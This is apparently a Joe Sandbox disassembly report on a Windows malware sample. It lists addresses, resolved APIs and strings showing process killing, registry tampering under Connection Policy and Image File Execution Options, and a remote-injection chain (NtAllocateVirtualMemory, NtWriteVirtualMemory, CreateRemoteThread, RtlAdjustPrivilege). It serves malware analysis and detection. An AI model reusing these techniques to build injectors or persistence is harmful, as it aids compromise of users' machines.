0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x0040423b
0x00404253
0x00404253
0x00404196
0x00404275
0x00404275
0x00404279
0x0040427e
0x0040427e
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040426e
0x0040426e
0x0040426e
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x0040453f
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x00404644
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404302
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x004042fc
0x0040401a
0x0040401f
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040ed
0x0040410e
0x0040410e
0x00404110
0x0040411b
0x0040411c
0x00000000
0x0040411c
0x00404123
0x00404123
0x00404124
0x0040410c
0x0040410c
0x0040410c
0x00000000
0x00404126
0x00404126
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x0040412c
0x00404138
0x00404144
0x00404145
0x00000000
0x00404145
0x0040412a
0x004040f2
0x004040f2
0x004040f4
0x00404107
0x00000000
0x004040f6
0x004040ff
0x00404100
0x00000000
0x00404100
0x00404027
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x0040404b
0x00404055
0x00404057
0x00000000
0x00404057
0x00000000
0x0040404b
0x00404025
0x00403ffa

APIs

wsprintfA.USER32 ref: 00403FC0
CreateMutexA.KERNEL32(00408778,00000001,qnd_b__-12,00408816,%02X,00000001,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,wininet.dll,iphlpapi.dll), ref: 00403FD1
GetLastError.KERNEL32 ref: 00403FE5
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404004
RegDeleteValueA.ADVAPI32(00000000,SubshellState,00000002,00000000), ref: 0040402D
RegCloseKey.ADVAPI32(?,00000000,SubshellState,00000002,00000000), ref: 00404036
GetCurrentProcessId.KERNEL32(00000002,00000000), ref: 0040405A
Process32First.KERNEL32(00000000,00000128), ref: 00404077
lstrcmpi.KERNEL32 ref: 0040409E
lstrcmpi.KERNEL32 ref: 004040AD
OpenProcess.KERNEL32(00100201,00000000,?,00000000,00000000,00000128,00000000,00000128), ref: 004040C4
Process32Next.KERNEL32 ref: 004040E3
CloseHandle.KERNEL32(00000000,00000000,00000128), ref: 004040ED
SetPriorityClass.KERNEL32(?,00000040,00000000,00000000,00000128), ref: 00404100
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000128), ref: 0040411C
WaitForSingleObject.KERNEL32(?,00001388,00000000,00000000,00000128), ref: 00404138
CloseHandle.KERNEL32(?,?,00001388,00000000,00000000,00000128), ref: 00404145
SetFileAttributesA.KERNEL32(?,00000080,00000000,00000000,00000128), ref: 00404160
DeleteFileA.KERNEL32(?,?,00000080,00000000,00000000,00000128), ref: 00404166
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002,00000000), ref: 0040418F
RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002,00000000), ref: 004041C8
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012), ref: 004041F9
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000000,00412190,00000012), ref: 00404219
RegCloseKey.ADVAPI32(?,?,Default Flags,00000000,00000000,00412190,00000012), ref: 00404231
RegDeleteKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy), ref: 00404247
RegCloseKey.ADVAPI32(?,80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00020019,?,00000002), ref: 00404253
CloseHandle.KERNEL32(?,00000000), ref: 00404279

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 0040454A
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00404185, 004041BE, 0040423D
winrnt.exe, xrefs: 004040A7
%02X, xrefs: 00403FB6
SubshellState, xrefs: 00404027
Default Flags, xrefs: 004041ED, 0040420D
qnd_b__-12, xrefs: 00403FC5

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Close$CreateDeleteHandleProcessValue$FileOpenProcess32lstrcmpi$AttributesClassCurrentErrorFirstLastMutexNextObjectPriorityQuerySingleSnapshotTerminateToolhelp32Waitwsprintf
String ID: %02X$Default Flags$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$SubshellState$qnd_b__-12$winrnt.exe
API String ID: 3062393105-1268784324
Opcode ID: 98a80f0eb40c56e530e9de234d6d5deaded7ba71dbb13d6b65b7ceaa3a3251f0
Instruction ID: 67419a56703f7777b6a55b50def0b8cf4c76efdf6f2211b84b0029fbdad28417
Opcode Fuzzy Hash: 98a80f0eb40c56e530e9de234d6d5deaded7ba71dbb13d6b65b7ceaa3a3251f0
Instruction Fuzzy Hash: FA81F570284740B9E731AB718C46FAF7698AFD0748F60083FB785B50C2DABC95508A5F

Uniqueness

Uniqueness Score: -1.00%

Function 004035B5 Relevance: 43.9, APIs: 16, Strings: 9, Instructions: 175libraryloadernativeCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,CreateRemoteThread), ref: 004035CD
LoadLibraryA.KERNEL32(ntdll.dll,NtAllocateVirtualMemory,?,CreateRemoteThread), ref: 0040363B
GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 00403643
GetProcAddress.KERNEL32(00000000,NtWriteVirtualMemory), ref: 00403653
GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00403663
GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 00403673
RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,00000000,RtlAdjustPrivilege,00000000,NtShutdownSystem,00000000,NtWriteVirtualMemory,00000000,ntdll.dll,NtAllocateVirtualMemory,?,CreateRemoteThread), ref: 00403691
GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004036BD
GetProcAddress.KERNEL32(00000000,NtQueryInformationToken), ref: 004036D2
NtQueryInformationToken.NTDLL(?,00000002,00000000,00002000,?,?,CreateRemoteThread), ref: 0040371A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00002000,?), ref: 00403783
CloseHandle.KERNEL32(?,?,CreateRemoteThread), ref: 004037C0
WSAStartup.WS2_32(00000002,?), ref: 00403817
GetTickCount.KERNEL32 ref: 0040381C
GetCurrentProcessId.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 00403823
GetCurrentThreadId.KERNEL32 ref: 0040382A

Strings

NtWriteVirtualMemory, xrefs: 004035FB, 00403648
NtOpenProcessToken, xrefs: 00403693, 004036B7
RtlAdjustPrivilege, xrefs: 0040361F, 00403668
NtShutdownSystem, xrefs: 0040360D, 00403658
CreateRemoteThread, xrefs: 004035B5, 004035C7
NtAllocateVirtualMemory, xrefs: 004035E9, 00403631
ntdll.dll, xrefs: 004035D7, 00403636
NtQueryInformationToken, xrefs: 004036A5, 004036CC
rasapi32.dll, xrefs: 00403834

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: AddressProc$CurrentInformationQueryToken$AdjustCloseCountHandleLibraryLoadPrivilegeProcessStartupThreadTick
String ID: CreateRemoteThread$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$RtlAdjustPrivilege$ntdll.dll$rasapi32.dll
API String ID: 111222507-3799945703
Opcode ID: 941cba1f30b9a4a6f14bb1e6e96487b2615b3833d48f22c3ef979f0693e4a494
Instruction ID: d6fc4fe45969fd7e8e5a1e80a5a711af8d5e660b819589561f52a4a0fe520863
Opcode Fuzzy Hash: 941cba1f30b9a4a6f14bb1e6e96487b2615b3833d48f22c3ef979f0693e4a494
Instruction Fuzzy Hash: 0151F97020834269D7215B788D8575B2E8CAB06355F208977F1A1FB2D2D7FCD9C1CA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403478 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 132processfilelibraryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,004107CF), ref: 00403490
GetModuleFileNameA.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 004034AE
GetCommandLineA.KERNEL32(00000000,?,00000104,kernel32.dll,004120F0), ref: 004034B3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004034CE
GetCurrentProcessId.KERNEL32(00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004034E2
Process32First.KERNEL32(?,?), ref: 0040350A
Process32Next.KERNEL32 ref: 00403532
CloseHandle.KERNEL32(?,?,?), ref: 00403540
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?), ref: 00403550
CloseHandle.KERNEL32(00000000,00000000,000000FF,?,?,?), ref: 00403556
GetStartupInfoA.KERNEL32(?), ref: 00403563
OpenProcess.KERNEL32(00100000,00000000,?,?,?), ref: 0040359A
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000FF,?,?), ref: 0040449C
